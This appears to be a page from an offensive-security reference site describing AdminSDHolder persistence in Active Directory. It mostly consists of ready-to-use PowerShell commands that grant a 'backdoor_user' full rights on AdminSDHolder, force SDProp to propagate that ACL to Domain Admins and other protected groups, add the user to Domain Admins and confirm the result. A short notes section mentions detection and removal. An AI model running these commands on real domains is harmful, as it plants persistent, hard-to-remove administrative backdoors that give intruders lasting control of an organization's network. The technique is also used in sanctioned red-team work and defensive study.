> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# AdminSDHolder

> AdminSDHolder persistence: abuse SDProp to maintain ACL-based backdoor on protected groups.

## Overview

AdminSDHolder is a container whose ACL is copied to all protected objects (Domain Admins, Enterprise Admins, etc.) every 60 minutes by SDProp process. Modify AdminSDHolder ACL → persistent access to protected groups.

***

## Protected Groups

* Domain Admins
* Enterprise Admins
* Schema Admins
* Administrators
* Account Operators
* Backup Operators
* Server Operators
* Domain Controllers
* krbtgt

***

## Add Backdoor ACE

### PowerView

```powershell theme={"dark"}
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -PrincipalIdentity backdoor_user -Rights All
```

### AD Module

```powershell theme={"dark"}
$sid = New-Object System.Security.Principal.SecurityIdentifier (Get-ADUser backdoor_user).SID
$acl = Get-Acl "AD:CN=AdminSDHolder,CN=System,DC=domain,DC=local"
$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $sid, "GenericAll", "Allow"
$acl.AddAccessRule($ace)
Set-Acl "AD:CN=AdminSDHolder,CN=System,DC=domain,DC=local" $acl
```

***

## Wait for SDProp (or Force)

SDProp runs every 60 minutes. Force it:

```powershell theme={"dark"}
Invoke-ADSDPropagation
```

Or manually trigger:

```cmd theme={"dark"}
# Run as SYSTEM on DC
ldifde -i -f - <<EOF
dn:
changetype: modify
replace: runProtectAdminGroupsTask
runProtectAdminGroupsTask: 1
EOF
```

***

## After SDProp Runs

backdoor\_user now has GenericAll on Domain Admins, Enterprise Admins, etc.

```powershell theme={"dark"}
# Add yourself to Domain Admins
Add-DomainGroupMember -Identity "Domain Admins" -Members backdoor_user
```

Even if removed from group, ACL persists through next SDProp cycle.

***

## Verify

```powershell theme={"dark"}
Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ? {$_.IdentityReference -match "backdoor_user"}
```

***

## Notes

* Very persistent — ACL rewritten every 60 min
* Removing ACE from AdminSDHolder removes persistence
* Detection: monitor AdminSDHolder ACL changes
* Requires Domain Admin to set initially

***

## Quick Reference

| Task         | Command                                                                                 |
| ------------ | --------------------------------------------------------------------------------------- |
| Add ACE      | `Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity user -Rights All` |
| Force SDProp | `Invoke-ADSDPropagation`                                                                |
| Verify       | Check ACL on "Domain Admins" for backdoor user                                          |
| Remove       | Delete ACE from AdminSDHolder                                                           |
